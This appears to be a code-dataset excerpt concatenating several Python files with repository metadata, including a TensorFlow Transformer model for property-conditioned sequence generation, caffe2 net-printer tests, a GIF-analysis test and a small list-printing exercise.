:return: The selected of this UpdateDatabaseObjectReq.
:rtype: bool
"""
return self._selected
@selected.setter
def selected(self, selected):
"""Sets the selected of this UpdateDatabaseObjectReq.
        Whether to pick objects explicitly. true: migrate only the selected objects; false: migrate everything. Defaults to false when omitted.
:param selected: The selected of this UpdateDatabaseObjectReq.
:type: bool
"""
self._selected = selected
@property
def sync_database(self):
"""Gets the sync_database of this UpdateDatabaseObjectReq.
        Whether synchronization is done at the database level.
:return: The sync_database of this UpdateDatabaseObjectReq.
:rtype: bool
"""
return self._sync_database
@sync_database.setter
def sync_database(self, sync_database):
"""Sets the sync_database of this UpdateDatabaseObjectReq.
        Whether synchronization is done at the database level.
:param sync_database: The sync_database of this UpdateDatabaseObjectReq.
:type: bool
"""
self._sync_database = sync_database
@property
def job(self):
"""Gets the job of this UpdateDatabaseObjectReq.
        Database object selection info; required when ``selected`` is true.
:return: The job of this UpdateDatabaseObjectReq.
:rtype: list[DatabaseInfo]
"""
return self._job
@job.setter
def job(self, job):
"""Sets the job of this UpdateDatabaseObjectReq.
        Database object selection info; required when ``selected`` is true.
:param job: The job of this UpdateDatabaseObjectReq.
:type: list[DatabaseInfo]
"""
self._job = job
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
import simplejson as json
if six.PY2:
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)
def __repr__(self):
"""For `print`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, UpdateDatabaseObjectReq):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"[email protected]"
]
| |
a0fe504dc7c1f9b916085038b62f0c6730b2f12e | 4f1144a15ba86cc183c5c69e578db8019133e660 | /src/official/transformer/v2/optgen_v13.py | 4d5704a53d28e02a0633f5fa29f6e7462359e4ca | [
"MIT"
]
| permissive | AspirinCode/cmg | 244b718c64659cde505cedc449a5b65e5ede7c6d | fe5b4d8778df7bd85f78ec463d85185415a1c591 | refs/heads/main | 2023-01-03T09:42:47.433393 | 2020-10-26T21:39:29 | 2020-10-26T21:39:29 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 30,494 | py | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Defines the Transformer model in TF 2.0.
Model paper: https://arxiv.org/pdf/1706.03762.pdf
Transformer model code source: https://github.com/tensorflow/tensor2tensor
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from src.official.transformer.model import model_utils
from src.official.transformer.v2 import attention_layer
from src.official.transformer.v2 import beam_search
from src.official.transformer.v2 import embedding_layer
from src.official.transformer.v2 import ffn_layer
from src.official.transformer.v2 import metrics
def get_valnet(logits, embedding_softmax_layer, lstm_layer, output_layer):
ids = tf.keras.backend.argmax(logits, axis=-1)
embedded_inputs = embedding_softmax_layer(ids)
z = lstm_layer(embedded_inputs)
outputs = output_layer(z)
return outputs
def get_propnet(logits, embedding_softmax_layer, lstm_layer, idense_layer, output_layer):
ids = tf.keras.backend.argmax(logits, axis=-1)
embedded_inputs = embedding_softmax_layer(ids)
z = lstm_layer(embedded_inputs)
z = idense_layer(z)
outputs = output_layer(z)
return outputs
def get_simnet(logit1, inputs, embedding_softmax_layer, lstm_layer, idense_layer, output_layer):
ids1 = tf.keras.backend.argmax(logit1, axis=-1)
ids2 = inputs
embedded_input1 = embedding_softmax_layer(ids1)
embedded_input2 = embedding_softmax_layer(ids2)
seq1 = lstm_layer(embedded_input1) # [?, 64]
seq2 = lstm_layer(embedded_input2) # [?, 64]
z = tf.concat([seq1, seq2], axis=1) # [?, 128]
z = idense_layer(z)
outputs = output_layer(z)
return outputs
def create_model(params, is_train):
"""Creates transformer model."""
with tf.name_scope("model"):
if is_train:
inputs = tf.keras.layers.Input((None,), dtype="int64", name="inputs")
targets = tf.keras.layers.Input((None,), dtype="int64", name="targets")
px = tf.keras.layers.Input((3,), dtype="float32", name="px")
py = tf.keras.layers.Input((3,), dtype="float32", name="py")
# sim = tf.keras.layers.Input((1,), dtype="float32", name="sim")
internal_model = Transformer(params, name="optgen_v13")
logits = internal_model([inputs, px, py, targets], training=is_train)
# logits = internal_model([inputs, px, sim, py, targets], training=is_train)
vocab_size = params["vocab_size"]
label_smoothing = params["label_smoothing"]
if params["enable_metrics_in_training"]:
logits = metrics.MetricLayer(vocab_size)([logits, targets])
logits = tf.keras.layers.Lambda(lambda x: x, name="logits")(logits)
valnet_embedding_softmax_layer = embedding_layer.EmbeddingFreezable(
params["vocab_size"], params["valnet_hidden_size"], trainable=False)
valnet_bi_lstm_layer = tf.keras.layers.Bidirectional(
tf.keras.layers.LSTM(params["valnet_hidden_size"], name="valnet_lstm", trainable=False))
valnet_output_layer = tf.keras.layers.Dense(1, use_bias=True, activation=tf.nn.sigmoid, name="valnet_output",
trainable=False)
valnet_hat = get_valnet(logits, valnet_embedding_softmax_layer, valnet_bi_lstm_layer, valnet_output_layer)
propnet_embedding_softmax_layer = embedding_layer.EmbeddingFreezable(
params["vocab_size"], params["propnet_hidden_size"], trainable=False)
propnet_bi_lstm_layer = tf.keras.layers.Bidirectional(
tf.keras.layers.LSTM(params["propnet_hidden_size"], name="prop_lstm", trainable=False))
propnet_idense_layer = tf.keras.layers.Dense(100, use_bias=True, activation=tf.nn.sigmoid,
name="propnet_idense", trainable=False)
propnet_output_layer = tf.keras.layers.Dense(3, use_bias=True, activation=tf.nn.sigmoid,
name="propnet_output", trainable=False)
propnet_hat = get_propnet(logits, propnet_embedding_softmax_layer, propnet_bi_lstm_layer,
propnet_idense_layer, propnet_output_layer)
simnet_embedding_softmax_layer = embedding_layer.EmbeddingFreezable(
params["vocab_size"], params["simnet_hidden_size"], trainable=False)
simnet_bi_lstm_layer = tf.keras.layers.Bidirectional(
tf.keras.layers.LSTM(params["simnet_hidden_size"], name="simnet_lstm", trainable=False))
simnet_idense_layer = tf.keras.layers.Dense(100, use_bias=True, activation=tf.nn.relu, name="simnet_idense",
trainable=False)
simnet_output_layer = tf.keras.layers.Dense(1, use_bias=True, activation=tf.nn.sigmoid, name="simnet_output",
trainable=False)
simnet_hat = get_simnet(logits, inputs, simnet_embedding_softmax_layer, simnet_bi_lstm_layer,
simnet_idense_layer, simnet_output_layer)
model = tf.keras.Model([inputs, px, py, targets], logits)
# model = tf.keras.Model([inputs, px, sim, py, targets], logits)
loss = metrics.transformer_loss(
logits, targets, label_smoothing, vocab_size)
model.add_loss(loss)
valnet_true = tf.ones_like(valnet_hat)
loss_valnet = tf.keras.losses.binary_crossentropy(
valnet_true,
valnet_hat,
from_logits=False,
label_smoothing=0
)
model.add_loss(tf.reduce_sum(loss_valnet))
propnet_true = tf.keras.layers.Lambda(lambda x: x)(py)
loss_propnet = tf.keras.losses.mse(propnet_true, propnet_hat)
model.add_loss(tf.reduce_sum(loss_propnet))
simnet_true = tf.ones_like(simnet_hat)
loss_simnet = tf.keras.losses.binary_crossentropy(
simnet_true,
simnet_hat,
from_logits=False,
label_smoothing=0
)
model.add_loss(tf.reduce_sum(loss_simnet))
return model
else:
inputs = tf.keras.layers.Input((None,), dtype="int64", name="inputs")
px = tf.keras.layers.Input((3,), dtype="float32", name="px")
py = tf.keras.layers.Input((3,), dtype="float32", name="py")
# sim = tf.keras.layers.Input((1,), dtype="float32", name="sim")
internal_model = Transformer(params, name="optgen_v13")
# ret = internal_model([inputs, px, sim, py], training=is_train)
ret = internal_model([inputs, px, py], training=is_train)
outputs, scores = ret["outputs"], ret["scores"]
return tf.keras.Model([inputs, px, py], [outputs, scores])
# return tf.keras.Model([inputs, px, sim, py], [outputs, scores])
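# Illustrative hyperparameter sketch (added; the values are placeholders,
# not the project's real config). These are the keys this module reads.
EXAMPLE_PARAMS = {
    "vocab_size": 70, "hidden_size": 128, "num_hidden_layers": 4,
    "num_heads": 8, "filter_size": 512, "dtype": tf.float32,
    "layer_postprocess_dropout": 0.1, "attention_dropout": 0.1,
    "relu_dropout": 0.1, "label_smoothing": 0.1,
    "enable_metrics_in_training": False, "extra_decode_length": 50,
    "beam_size": 4, "alpha": 0.6, "valnet_hidden_size": 64,
    "propnet_hidden_size": 64, "simnet_hidden_size": 64,
}
# e.g. model = create_model(EXAMPLE_PARAMS, is_train=False)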
class Transformer(tf.keras.Model):
"""Transformer model with Keras.
Implemented as described in: https://arxiv.org/pdf/1706.03762.pdf
The Transformer model consists of an encoder and decoder. The input is an int
sequence (or a batch of sequences). The encoder produces a continuous
representation, and the decoder uses the encoder output to generate
probabilities for the output sequence.
"""
def __init__(self, params, name=None):
"""Initialize layers to build Transformer model.
Args:
params: hyperparameter object defining layer sizes, dropout values, etc.
name: name of the model.
"""
super(Transformer, self).__init__(name=name)
self.params = params
self.embedding_softmax_layer = embedding_layer.EmbeddingSharedWeights(
params["vocab_size"], params["hidden_size"])
self.encoder_stack = EncoderStack(params)
self.decoder_stack = DecoderStack(params)
self.property_emb_layer = tf.keras.layers.Dense(3, use_bias=True, activation=tf.nn.relu,
name="property_embedding")
def get_config(self):
return {
"params": self.params,
}
def call(self, inputs, training):
"""Calculate target logits or inferred target sequences.
Args:
inputs: input tensor list of size 1 or 2.
First item, inputs: int tensor with shape [batch_size, input_length].
Second item (optional), targets: None or int tensor with shape
[batch_size, target_length].
training: boolean, whether in training mode or not.
Returns:
If targets is defined, then return logits for each word in the target
sequence. float tensor with shape [batch_size, target_length, vocab_size]
If target is none, then generate output sequence one token at a time.
returns a dictionary {
outputs: [batch_size, decoded length]
scores: [batch_size, float]}
Even when float16 is used, the output tensor(s) are always float32.
"""
if len(inputs) == 4:
inputs, px, py, targets = inputs[0], inputs[1], inputs[2], inputs[3]
else: # 3
inputs, px, py, targets = inputs[0], inputs[1], inputs[2], None
# if len(inputs) == 5:
# inputs, px, sim, py, targets = inputs[0], inputs[1], inputs[2], inputs[3], inputs[4]
# else: # 4
# inputs, px, sim, py, targets = inputs[0], inputs[1], inputs[2], inputs[3], None
# Variance scaling is used here because it seems to work in many problems.
# Other reasonable initializers may also work just as well.
with tf.name_scope("Transformer"):
# Calculate attention bias for encoder self-attention and decoder
# multi-headed attention layers.
attention_bias = model_utils.get_padding_bias(inputs)
# Run the inputs through the encoder layer to map the symbol
# representations to continuous representations.
encoder_outputs = self.encode(inputs, attention_bias, training)
# encoder_outputs = self.concat_property(encoder_outputs, px, sim, py)
encoder_outputs = self.concat_property(encoder_outputs, px, py)
# Generate output sequence if targets is None, or return logits if target
# sequence is known.
if targets is None:
return self.predict(encoder_outputs, attention_bias, training)
else:
logits = self.decode(targets, encoder_outputs, attention_bias, training)
return logits
def concat_property(self, encoder_outputs, px, py):
  # def concat_property(self, encoder_outputs, px, sim, py):
"""Generate logits for each value in the target sequence.
Args:
encoder_outputs: continuous representation of input sequence. float tensor
with shape [batch_size, input_length, hidden_size]
px: float tensor with property of x [batch_size, 3]
py: float tensor with property of y [batch_size, 3]
Returns:
float32 tensor with shape [batch_size, input_length, hidden_size+6]
"""
input_length = tf.shape(encoder_outputs)[1]
px = self.property_emb_layer(px)
py = self.property_emb_layer(py)
px = tf.tile(tf.expand_dims(px, axis=1), multiples=[1, input_length, 1])
# sim = tf.tile(tf.expand_dims(sim, axis=1), multiples=[1, input_length, 1])
py = tf.tile(tf.expand_dims(py, axis=1), multiples=[1, input_length, 1])
result = tf.concat([encoder_outputs, px, py], axis=-1)
# result = tf.concat([encoder_outputs, px, sim, py], axis=-1)
return result
def encode(self, inputs, attention_bias, training):
"""Generate continuous representation for inputs.
Args:
inputs: int tensor with shape [batch_size, input_length].
attention_bias: float tensor with shape [batch_size, 1, 1, input_length].
training: boolean, whether in training mode or not.
Returns:
float tensor with shape [batch_size, input_length, hidden_size]
"""
with tf.name_scope("encode"):
# Prepare inputs to the layer stack by adding positional encodings and
# applying dropout.
embedded_inputs = self.embedding_softmax_layer(inputs)
embedded_inputs = tf.cast(embedded_inputs, self.params["dtype"])
inputs_padding = model_utils.get_padding(inputs)
attention_bias = tf.cast(attention_bias, self.params["dtype"])
with tf.name_scope("add_pos_encoding"):
length = tf.shape(embedded_inputs)[1]
pos_encoding = model_utils.get_position_encoding(
length, self.params["hidden_size"])
pos_encoding = tf.cast(pos_encoding, self.params["dtype"])
encoder_inputs = embedded_inputs + pos_encoding
if training:
encoder_inputs = tf.nn.dropout(
encoder_inputs, rate=self.params["layer_postprocess_dropout"])
return self.encoder_stack(
encoder_inputs, attention_bias, inputs_padding, training=training)
def decode(self, targets, encoder_outputs, attention_bias, training):
"""Generate logits for each value in the target sequence.
Args:
targets: target values for the output sequence. int tensor with shape
[batch_size, target_length]
encoder_outputs: continuous representation of input sequence. float tensor
with shape [batch_size, input_length, hidden_size]
attention_bias: float tensor with shape [batch_size, 1, 1, input_length]
training: boolean, whether in training mode or not.
Returns:
float32 tensor with shape [batch_size, target_length, vocab_size]
"""
with tf.name_scope("decode"):
# Prepare inputs to decoder layers by shifting targets, adding positional
# encoding and applying dropout.
decoder_inputs = self.embedding_softmax_layer(targets)
decoder_inputs = tf.cast(decoder_inputs, self.params['dtype'])
attention_bias = tf.cast(attention_bias, self.params["dtype"])
with tf.name_scope("shift_targets"):
# Shift targets to the right, and remove the last element
decoder_inputs = tf.pad(decoder_inputs,
[[0, 0], [1, 0], [0, 0]])[:, :-1, :]
with tf.name_scope("add_pos_encoding"):
length = tf.shape(decoder_inputs)[1]
pos_encoding = model_utils.get_position_encoding(
length, self.params["hidden_size"])
pos_encoding = tf.cast(pos_encoding, self.params["dtype"])
decoder_inputs += pos_encoding
if training:
decoder_inputs = tf.nn.dropout(
decoder_inputs, rate=self.params["layer_postprocess_dropout"])
      # Compute the self-attention bias and run the decoder stack.
decoder_self_attention_bias = model_utils.get_decoder_self_attention_bias(
length, dtype=self.params['dtype'])
outputs = self.decoder_stack(
decoder_inputs,
encoder_outputs,
decoder_self_attention_bias,
attention_bias,
training=training)
logits = self.embedding_softmax_layer(outputs, mode="linear")
logits = tf.cast(logits, tf.float32)
return logits
def _get_symbols_to_logits_fn(self, max_decode_length, training):
"""Returns a decoding function that calculates logits of the next tokens."""
timing_signal = model_utils.get_position_encoding(
max_decode_length + 1, self.params["hidden_size"])
decoder_self_attention_bias = model_utils.get_decoder_self_attention_bias(
max_decode_length)
def symbols_to_logits_fn(ids, i, cache):
"""Generate logits for next potential IDs.
Args:
ids: Current decoded sequences. int tensor with shape [batch_size *
beam_size, i + 1]
i: Loop index
cache: dictionary of values storing the encoder output, encoder-decoder
attention bias, and previous decoder attention values.
Returns:
Tuple of
(logits with shape [batch_size * beam_size, vocab_size],
updated cache values)
"""
# Set decoder input to the last generated IDs
decoder_input = ids[:, -1:]
# Preprocess decoder input by getting embeddings and adding timing signal.
decoder_input = self.embedding_softmax_layer(decoder_input)
decoder_input += timing_signal[i:i + 1]
self_attention_bias = decoder_self_attention_bias[:, :, i:i + 1, :i + 1]
decoder_outputs = self.decoder_stack(
decoder_input,
cache.get("encoder_outputs"),
self_attention_bias,
cache.get("encoder_decoder_attention_bias"),
training=training,
cache=cache)
logits = self.embedding_softmax_layer(decoder_outputs, mode="linear")
logits = tf.squeeze(logits, axis=[1])
return logits, cache
return symbols_to_logits_fn
def predict(self, encoder_outputs, encoder_decoder_attention_bias, training):
"""Return predicted sequence."""
# Currently, we always do prediction in float32.
# TODO(reedwm): Add float16 support.
encoder_outputs = tf.cast(encoder_outputs, tf.float32)
batch_size = tf.shape(encoder_outputs)[0]
input_length = tf.shape(encoder_outputs)[1]
max_decode_length = input_length + self.params["extra_decode_length"]
symbols_to_logits_fn = self._get_symbols_to_logits_fn(
max_decode_length, training)
# Create initial set of IDs that will be passed into symbols_to_logits_fn.
initial_ids = tf.ones([batch_size], dtype=tf.int32) # 1: [BEGIN]
# Create cache storing decoder attention values for each layer.
# pylint: disable=g-complex-comprehension
cache = {
"layer_%d" % layer: {
"k": tf.zeros([batch_size, 0, self.params["hidden_size"]]),
"v": tf.zeros([batch_size, 0, self.params["hidden_size"]])
} for layer in range(self.params["num_hidden_layers"])
}
# pylint: enable=g-complex-comprehension
# Add encoder output and attention bias to the cache.
cache["encoder_outputs"] = encoder_outputs
cache["encoder_decoder_attention_bias"] = encoder_decoder_attention_bias
# Use beam search to find the top beam_size sequences and scores.
decoded_ids, scores = beam_search.sequence_beam_search(
symbols_to_logits_fn=symbols_to_logits_fn,
initial_ids=initial_ids,
initial_cache=cache,
vocab_size=self.params["vocab_size"],
beam_size=self.params["beam_size"],
alpha=self.params["alpha"],
max_decode_length=max_decode_length,
eos_id=2) # 2: [END]
    # debug: tf.print(decoded_ids.shape, output_stream=sys.stderr)
    # Get the top sequence for each batch element.
    # top_decoded_ids = decoded_ids[:, 0, 1:]
    # for i in range(self.params["beam_size"]):
    #   candidate_ids = decoded_ids[:, i, 0:]  # includes [BEGIN]
    #   get_propnet(params, candidate_ids)
    top_decoded_ids = decoded_ids[:, 0, 0:]  # includes [BEGIN]; decoded_ids is [batch, beam_size, length]
top_scores = scores[:, 0]
return {"outputs": top_decoded_ids, "scores": top_scores}
class LayerNormalization(tf.keras.layers.Layer):
"""Applies layer normalization."""
def __init__(self, hidden_size):
super(LayerNormalization, self).__init__()
self.hidden_size = hidden_size
def build(self, input_shape):
"""Builds the layer."""
# Passing experimental_autocast=False causes these variables to not be
# automatically casted to fp16 when mixed precision is used. Since we use
# float32 in call() for numeric stability, we do not want variables to be
# casted to fp16.
self.scale = self.add_weight(
"layer_norm_scale",
shape=[self.hidden_size],
dtype="float32",
initializer=tf.ones_initializer(),
experimental_autocast=False)
self.bias = self.add_weight(
"layer_norm_bias",
shape=[self.hidden_size],
dtype="float32",
initializer=tf.zeros_initializer(),
experimental_autocast=False)
super(LayerNormalization, self).build(input_shape)
def get_config(self):
return {
"hidden_size": self.hidden_size,
}
def call(self, x, epsilon=1e-6):
input_dtype = x.dtype
if input_dtype == tf.float16:
x = tf.cast(x, tf.float32)
mean = tf.reduce_mean(x, axis=[-1], keepdims=True)
variance = tf.reduce_mean(tf.square(x - mean), axis=[-1], keepdims=True)
norm_x = (x - mean) * tf.math.rsqrt(variance + epsilon)
return tf.cast(norm_x * self.scale + self.bias, input_dtype)
class PrePostProcessingWrapper(tf.keras.layers.Layer):
"""Wrapper class that applies layer pre-processing and post-processing."""
def __init__(self, layer, params):
super(PrePostProcessingWrapper, self).__init__()
self.layer = layer
self.params = params
self.postprocess_dropout = params["layer_postprocess_dropout"]
def build(self, input_shape):
# Create normalization layer
self.layer_norm = LayerNormalization(self.params["hidden_size"])
super(PrePostProcessingWrapper, self).build(input_shape)
def get_config(self):
return {
"params": self.params,
}
def call(self, x, *args, **kwargs):
"""Calls wrapped layer with same parameters."""
# Preprocessing: apply layer normalization
training = kwargs["training"]
y = self.layer_norm(x)
# Get layer output
y = self.layer(y, *args, **kwargs)
# Postprocessing: apply dropout and residual connection
if training:
y = tf.nn.dropout(y, rate=self.postprocess_dropout)
return x + y
class EncoderStack(tf.keras.layers.Layer):
"""Transformer encoder stack.
The encoder stack is made up of N identical layers. Each layer is composed
of the sublayers:
1. Self-attention layer
2. Feedforward network (which is 2 fully-connected layers)
"""
def __init__(self, params):
super(EncoderStack, self).__init__()
self.params = params
self.layers = []
def build(self, input_shape):
"""Builds the encoder stack."""
params = self.params
for _ in range(params["num_hidden_layers"]):
# Create sublayers for each layer.
self_attention_layer = attention_layer.SelfAttention(
params["hidden_size"], params["num_heads"],
params["attention_dropout"])
feed_forward_network = ffn_layer.FeedForwardNetwork(
params["hidden_size"], params["filter_size"], params["relu_dropout"])
self.layers.append([
PrePostProcessingWrapper(self_attention_layer, params),
PrePostProcessingWrapper(feed_forward_network, params)
])
# Create final layer normalization layer.
self.output_normalization = LayerNormalization(params["hidden_size"])
super(EncoderStack, self).build(input_shape)
def get_config(self):
return {
"params": self.params,
}
def call(self, encoder_inputs, attention_bias, inputs_padding, training):
"""Return the output of the encoder layer stacks.
Args:
encoder_inputs: tensor with shape [batch_size, input_length, hidden_size]
attention_bias: bias for the encoder self-attention layer. [batch_size, 1,
1, input_length]
inputs_padding: tensor with shape [batch_size, input_length], inputs with
zero paddings.
training: boolean, whether in training mode or not.
Returns:
Output of encoder layer stack.
float32 tensor with shape [batch_size, input_length, hidden_size]
"""
for n, layer in enumerate(self.layers):
# Run inputs through the sublayers.
self_attention_layer = layer[0]
feed_forward_network = layer[1]
with tf.name_scope("layer_%d" % n):
with tf.name_scope("org_encoder_self_attention"):
encoder_inputs = self_attention_layer(
encoder_inputs, attention_bias, training=training)
with tf.name_scope("org_encoder_ffn_org"):
encoder_inputs = feed_forward_network(
encoder_inputs, training=training)
return self.output_normalization(encoder_inputs)
class DecoderStack(tf.keras.layers.Layer):
"""Transformer decoder stack.
Like the encoder stack, the decoder stack is made up of N identical layers.
Each layer is composed of the sublayers:
1. Self-attention layer
2. Multi-headed attention layer combining encoder outputs with results from
the previous self-attention layer.
3. Feedforward network (2 fully-connected layers)
"""
def __init__(self, params):
super(DecoderStack, self).__init__()
self.params = params
self.layers = []
def build(self, input_shape):
"""Builds the decoder stack."""
params = self.params
for _ in range(params["num_hidden_layers"]):
self_attention_layer = attention_layer.SelfAttention(
params["hidden_size"], params["num_heads"],
params["attention_dropout"])
enc_dec_attention_layer = attention_layer.Attention(
params["hidden_size"], params["num_heads"],
params["attention_dropout"])
feed_forward_network = ffn_layer.FeedForwardNetwork(
params["hidden_size"], params["filter_size"], params["relu_dropout"])
self.layers.append([
PrePostProcessingWrapper(self_attention_layer, params),
PrePostProcessingWrapper(enc_dec_attention_layer, params),
PrePostProcessingWrapper(feed_forward_network, params)
])
self.output_normalization = LayerNormalization(params["hidden_size"])
super(DecoderStack, self).build(input_shape)
def get_config(self):
return {
"params": self.params,
}
def call(self,
decoder_inputs,
encoder_outputs,
decoder_self_attention_bias,
attention_bias,
training,
cache=None):
"""Return the output of the decoder layer stacks.
Args:
decoder_inputs: tensor with shape [batch_size, target_length, hidden_size]
encoder_outputs: tensor with shape [batch_size, input_length, hidden_size]
decoder_self_attention_bias: bias for decoder self-attention layer. [1, 1,
target_len, target_length]
attention_bias: bias for encoder-decoder attention layer. [batch_size, 1,
1, input_length]
training: boolean, whether in training mode or not.
cache: (Used for fast decoding) A nested dictionary storing previous
decoder self-attention values. The items are:
{layer_n: {"k": tensor with shape [batch_size, i, key_channels],
"v": tensor with shape [batch_size, i, value_channels]},
...}
Returns:
Output of decoder layer stack.
float32 tensor with shape [batch_size, target_length, hidden_size]
"""
for n, layer in enumerate(self.layers):
self_attention_layer = layer[0]
enc_dec_attention_layer = layer[1]
feed_forward_network = layer[2]
# Run inputs through the sublayers.
layer_name = "layer_%d" % n
layer_cache = cache[layer_name] if cache is not None else None
with tf.name_scope(layer_name):
with tf.name_scope("org_decoder_self_attention"):
decoder_inputs = self_attention_layer(
decoder_inputs,
decoder_self_attention_bias,
training=training,
cache=layer_cache)
with tf.name_scope("org_decoder_encdec_attention"):
decoder_inputs = enc_dec_attention_layer(
decoder_inputs,
encoder_outputs,
attention_bias,
training=training)
with tf.name_scope("org_decoder_ffn"):
decoder_inputs = feed_forward_network(
decoder_inputs, training=training)
return self.output_normalization(decoder_inputs)
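# Quick sanity sketch for the custom LayerNormalization defined above
# (added; the shapes are arbitrary illustrative values).
if __name__ == "__main__":
  layer_norm = LayerNormalization(hidden_size=8)
  x = tf.random.normal([2, 5, 8])  # [batch, length, hidden]
  print(layer_norm(x).shape)  # (2, 5, 8); normalized over the last axis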
| [
"[email protected]"
]
| |
3642d4130b2a6948154873329d6f8ed1f4a69df7 | 4f408d65db60911f56110c351cb3b64835e0c5fb | /caffe2/python/net_printer_test.py | 2d6f5a172326cc0d170bb65254e0db72b09f873c | [
"Apache-2.0",
"MIT",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"BSD-2-Clause"
]
| permissive | KeyKy/caffe2_SSD | a02c065aef2dbcfd00faae8be0440d7a4ff0fb76 | 7235688ea5e212dbe8609d780dd94c8c7d9fef54 | refs/heads/master | 2021-09-18T14:36:11.247427 | 2018-07-10T09:59:35 | 2018-07-10T09:59:35 | 89,928,918 | 8 | 5 | null | 2018-07-27T02:14:38 | 2017-05-01T14:04:20 | Jupyter Notebook | UTF-8 | Python | false | false | 2,901 | py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from caffe2.python import net_printer
from caffe2.python.checkpoint import Job
from caffe2.python.net_builder import ops
from caffe2.python.task import Task, final_output
import unittest
def example_loop():
with Task():
total = ops.Const(0)
total_large = ops.Const(0)
total_small = ops.Const(0)
total_tiny = ops.Const(0)
with ops.loop(10) as loop:
outer = ops.Mul([loop.iter(), ops.Const(10)])
with ops.loop(loop.iter()) as inner:
val = ops.Add([outer, inner.iter()])
with ops.If(ops.GE([val, ops.Const(80)])) as c:
ops.Add([total_large, val], [total_large])
with c.Elif(ops.GE([val, ops.Const(50)])) as c:
ops.Add([total_small, val], [total_small])
with c.Else():
ops.Add([total_tiny, val], [total_tiny])
ops.Add([total, val], total)
def example_task():
with Task():
with ops.task_init():
one = ops.Const(1)
two = ops.Add([one, one])
with ops.task_init():
three = ops.Const(3)
accum = ops.Add([two, three])
# here, accum should be 5
with ops.task_exit():
# here, accum should be 6, since this executes after lines below
seven_1 = ops.Add([accum, one])
six = ops.Add([accum, one])
ops.Add([accum, one], [accum])
seven_2 = ops.Add([accum, one])
o6 = final_output(six)
o7_1 = final_output(seven_1)
o7_2 = final_output(seven_2)
return o6, o7_1, o7_2
def example_job():
with Job() as job:
with job.init_group:
example_loop()
example_task()
return job
class TestNetPrinter(unittest.TestCase):
def test_print(self):
self.assertTrue(len(net_printer.to_string(example_job())) > 0)
def test_valid_job(self):
job = example_job()
with job:
with Task():
# distributed_ctx_init_* ignored by analyzer
ops.Add(['distributed_ctx_init_a', 'distributed_ctx_init_b'])
net_printer.analyze(example_job())
def test_undefined_blob(self):
job = example_job()
with job:
with Task():
ops.Add(['a', 'b'])
with self.assertRaises(AssertionError):
net_printer.analyze(job)
def test_multiple_definition(self):
job = example_job()
with job:
with Task():
ops.Add([ops.Const(0), ops.Const(1)], 'out1')
with Task():
ops.Add([ops.Const(2), ops.Const(3)], 'out1')
with self.assertRaises(AssertionError):
net_printer.analyze(job)
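# Standard entry point so the tests can be run directly (added; the
# original file relied on an external test runner).
if __name__ == '__main__':
    unittest.main()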
| [
"[email protected]"
]
| |
549746b4c2e4c7057bd7732d19f58753950efb1d | 5a3c4b802ea7d5ce380c38415929ebaa8799eb06 | /tests/test_analyze_gifs.py | 700b9bad30c536d79dd4ab352c4a24dcff1e0a73 | [
"MIT"
]
| permissive | get-wrecked/gifalyzer | fe18855c83b2b9e2188faef92b317fa81e913b4d | 0731d03766cfecf3fc6c64cc17022563da09b85b | refs/heads/master | 2022-04-10T10:57:35.602500 | 2019-06-10T22:32:04 | 2019-06-10T22:32:04 | 93,275,859 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 514 | py | import os
import pytest
from gifalyzer import analyze_gif
def test_analyze_gifs_normal():
report = analyze_gif(get_sample('200x202-26-130-130-0.gif'))
assert report['dimensions'] == (200, 202)
assert report['frame_count'] == 26
assert report['frame_delay_ms'] == 130
assert report['last_frame_delay_ms'] == 130
assert report['loop'] == 0
def get_sample(sample_name):
sample_dir = os.path.join(os.path.dirname(__file__), 'samples')
return os.path.join(sample_dir, sample_name)
| [
"[email protected]"
]
| |
ee57158af40112b19388d679d38127b30806d32a | c9ad6ad969de505b3c8471c6f46dfd782a0fb498 | /0x05-python-exceptions/0-safe_print_list.py | 16119623870bda212d1982f12fcd78d50aa22dde | []
| no_license | enterpreneur369/holbertonschool-higher_level_programming | 002fd5a19b40c8b1db06b34c4344e307f24c17ac | dd7d3f14bf3bacb41e2116d732ced78998a4afcc | refs/heads/master | 2022-06-20T00:57:27.736122 | 2020-05-06T14:26:10 | 2020-05-06T14:26:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 344 | py | #!/usr/bin/python3
""" safe_print_list
Python function to print the elements of a list
"""
def safe_print_list(my_list=[], x=0):
    p = 0
    try:
        for i in range(x):
            print("{}".format(my_list[i]), end="")
            p += 1
    except IndexError:
        pass
finally:
print()
return (p)
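# Illustrative call (added; not part of the original task file): prints
# "123", then the count; the out-of-range fourth index is swallowed by the
# IndexError handler, so the function returns 3.
if __name__ == "__main__":
    printed = safe_print_list([1, 2, 3], 4)
    print("printed:", printed)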
| [
"[email protected]"
]
| |
8a1230827541d821262fb3f1280ea53c87565736 | 8c618e16b15ad33a6ab6dcc4e0511e7a3acba094 | /remcall/schema/__init__.py | 8eb3a63f088ff55fb93ab052c031ca2d24a80f9d | [
"MIT"
]
